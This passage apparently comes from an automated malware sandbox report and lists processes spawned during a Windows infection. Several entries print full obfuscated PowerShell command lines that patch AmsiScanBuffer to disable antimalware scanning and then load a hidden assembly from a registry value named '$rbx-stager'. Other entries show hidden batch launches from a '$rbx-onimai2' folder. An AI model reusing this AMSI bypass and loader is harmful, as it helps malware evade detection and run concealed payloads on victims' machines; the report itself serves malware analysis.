$_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+'i'+'n'+'32.'+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'Na'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$xRDavNIGnzLLon=$gFfWslPcsIxEF.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+'A'+''+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+','+[Char](83)+''+[Char](116)+'at'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ivpgsCMtihnowdNIBeH=kveHNQwSSGcg @([String])([IntPtr]);$jwUlbRJyRtiCsTvojnOrQR=kveHNQwSSGcg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mpyIpGuEmdK=$gFfWslPcsIxEF.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+'a'+'n'+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+'3'+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+'l')));$scqjgRcUiQSTBu=$xRDavNIGnzLLon.Invoke($Null,@([Object]$mpyIpGuEmdK,[Object](''+[Char](76)+''+'o'+'adL'+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$CTojssOdwpNmEymGb=$xRDavNIGnzLLon.Invoke($Null,@([Object]$mpyIpGuEmdK,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$ssgLTbT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($scqjgRcUiQSTBu,$ivpgsCMtihnowdNIBeH).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+'.d'+'l'+''+[Char](108)+'');$EVtyXOreozsddqFlq=$xRDavNIGnzLLon.Invoke($Null,@([Object]$ssgLTbT,[Object](''+'A'+'m'+'s'+''+'i'+''+[Char](83)+''+'c'+'a'+'n'+''+[Char](66)+''+'u'+'f'+'f'+''+'e'+''+[Char](114)+'')));$vxbtwyzgyD=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CTojssOdwpNmEymGb,$jwUlbRJyRtiCsTvojnOrQR).Invoke($EVtyXOreozsddqFlq,[uint32]8,4,[ref]$vxbtwyzgyD);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EVtyXOreozsddqFlq,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CTojssOdwpNmEymGb,$jwUlbRJyRtiCsTvojnOrQR).Invoke($EVtyXOreozsddqFlq,[uint32]8,0x20,[ref]$vxbtwyzgyD);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+'r'+''+[Char](98)+''+'x'+'-'+[Char](115)+'t'+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
Imagebase:0x7ff7b2bb0000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:65
Start time:18:25:03
Start date:07/10/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:0xa50000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:66
Start time:18:25:04
Start date:07/10/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YrWHxoHyNMxl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mJbpaFOyxDMlLp,[Parameter(Position=1)][Type]$mBxcLwMzji)$qsXeIcuzIEU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+'l'+'e'+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+','+[Char](65)+''+'n'+'siC'+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qsXeIcuzIEU.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,H'+'i'+''+'d'+'e'+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsXeIcuzIEU.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+','+'V'+''+[Char](105)+''+'r'+'t'+[Char](117)+'a'+[Char](108)+'',$mBxcLwMzji,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $qsXeIcuzIEU.CreateType();}$XabpoaxiZGEGR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n32'+[Char](46)+'Uns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ONnlOWkAfaUoGE=$XabpoaxiZGEGR.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+'i'+[Char](99)+''+','+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$vKwAkflJKGpUwNhZmaw=YrWHxoHyNMxl @([String])([IntPtr]);$qJXsDxxmTbuQfbUlnZoHlQ=YrWHxoHyNMxl @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OQuoHIIkLqL=$XabpoaxiZGEGR.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+'l'+'3'+'2'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$VQjNvPkAQyhVaI=$ONnlOWkAfaUoGE.Invoke($Null,@([Object]$OQuoHIIkLqL,[Object]('Lo'+[Char](97)+''+'d'+''+[Char](76)+'ib'+[Char](114)+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$qfeujwJPycmGjtIGB=$ONnlOWkAfaUoGE.Invoke($Null,@([Object]$OQuoHIIkLqL,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'P'+[Char](114)+''+'o'+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$VjfjPYd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VQjNvPkAQyhVaI,$vKwAkflJKGpUwNhZmaw).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+'l');$ZjZDXRvDVpnzBqGGH=$ONnlOWkAfaUoGE.Invoke($Null,@([Object]$VjfjPYd,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+''+'r'+'')));$fXogPYmCjI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qfeujwJPycmGjtIGB,$qJXsDxxmTbuQfbUlnZoHlQ).Invoke($ZjZDXRvDVpnzBqGGH,[uint32]8,4,[ref]$fXogPYmCjI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ZjZDXRvDVpnzBqGGH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qfeujwJPycmGjtIGB,$qJXsDxxmTbuQfbUlnZoHlQ).Invoke($ZjZDXRvDVpnzBqGGH,[uint32]8,0x20,[ref]$fXogPYmCjI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+'W'+'A'+'R'+[Char](69)+'').GetValue(''+'$'+'r'+[Char](98)+''+'x'+'-'+[Char](115)+'t'+'a'+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
Imagebase:0x7ff7b2bb0000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:67
Start time:18:25:04
Start date:07/10/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:0xa50000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:68
Start time:18:25:04
Start date:07/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:69
Start time:18:25:04
Start date:07/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:70
Start time:18:25:04
Start date:07/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:71
Start time:18:25:04
Start date:07/10/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:0xa50000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:72
Start time:18:25:04
Start date:07/10/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NyGuwfckeOJe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kiyDauQzMkkpvQ,[Parameter(Position=1)][Type]$OzRVWwEZvx)$JcZRwmspQGK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+'e'+'',''+'C'+''+'l'+''+'a'+''+'s'+'s,P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+'a'+'le'+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+'t'+'o'+[Char](67)+''+'l'+''+'a'+'ss',[MulticastDelegate]);$JcZRwmspQGK.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kiyDauQzMkkpvQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'ime,'+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JcZRwmspQGK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OzRVWwEZvx,$kiyDauQzMkkpvQ).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $JcZRwmspQGK.CreateType();}$fMzQsfZpmgSNo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'em'+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+'ns'+'a'+''+'f'+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$kCZXEMoRMGVaoJ=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+'r'+''+[Char](111)+''+'c'+''+[Char](65)+'ddre'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+'b'+'l'+[Char](105)+'c'+[Char](44)+''+'S'+''+'t'+''+[Char](97)+''+[Char](116)+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$LYPstsFMvGDueCuqqFR=NyGuwfckeOJe @([String])([IntPtr]);$RBrwyhNopgzaGFyXfoYzuU=NyGuwfckeOJe @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ngqAWkNvnUU=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+'e'+'tM'+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'r'+[Char](110)+''+[Char](101)+'l'+'3'+'2'+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ViSGjgKFWHOvJi=$kCZXEMoRMGVaoJ.Invoke($Null,@([Object]$ngqAWkNvnUU,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+'yA')));$ErlOnVIeWPbCnQNFG=$kCZXEMoRMGVaoJ.Invoke($Null,@([Object]$ngqAWkNvnUU,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$JKCdsPm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ViSGjgKFWHOvJi,$LYPstsFMvGDueCuqqFR).Invoke(''+'a'+''+[Char](109)+'s'+'i'+''+[Char](46)+'dll');$iERkOmaiRJGubWlVw=$kCZXEMoRMGVaoJ.Invoke($Null,@([Object]$JKCdsPm,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+''+'S'+''+[Char](99)+'a'+[Char](110)+''+'B'+''+'u'+''+[Char](102)+''+'f'+'e'+[Char](114)+'')));$aRThctnmCd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ErlOnVIeWPbCnQNFG,$RBrwyhNopgzaGFyXfoYzuU).Invoke($iERkOmaiRJGubWlVw,[uint32]8,4,[ref]$aRThctnmCd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iERkOmaiRJGubWlVw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ErlOnVIeWPbCnQNFG,$RBrwyhNopgzaGFyXfoYzuU).Invoke($iERkOmaiRJGubWlVw,[uint32]8,0x20,[ref]$aRThctnmCd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'AR'+'E'+'').GetValue(''+'$'+''+[Char](114)+''+'b'+''+[Char](120)+''+'-'+''+'s'+'t'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
Imagebase:0x7ff7b2bb0000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                        Target ID:73
                                                                                                                                                        Start time:18:25:05
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:74
                                                                                                                                                        Start time:18:25:05
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:cmd.exe /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:75
                                                                                                                                                        Start time:18:25:06
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:76
                                                                                                                                                        Start time:18:25:07
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:77
                                                                                                                                                        Start time:18:25:07
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden
                                                                                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:78
                                                                                                                                                        Start time:18:25:14
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:79
                                                                                                                                                        Start time:18:25:14
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:80
                                                                                                                                                        Start time:18:25:14
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:81
                                                                                                                                                        Start time:18:25:14
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden
                                                                                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:82
                                                                                                                                                        Start time:18:25:16
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:83
                                                                                                                                                        Start time:18:25:16
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:84
                                                                                                                                                        Start time:18:25:17
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:wmic diskdrive get Model
                                                                                                                                                        Imagebase:0x7ff696f50000
                                                                                                                                                        File size:576'000 bytes
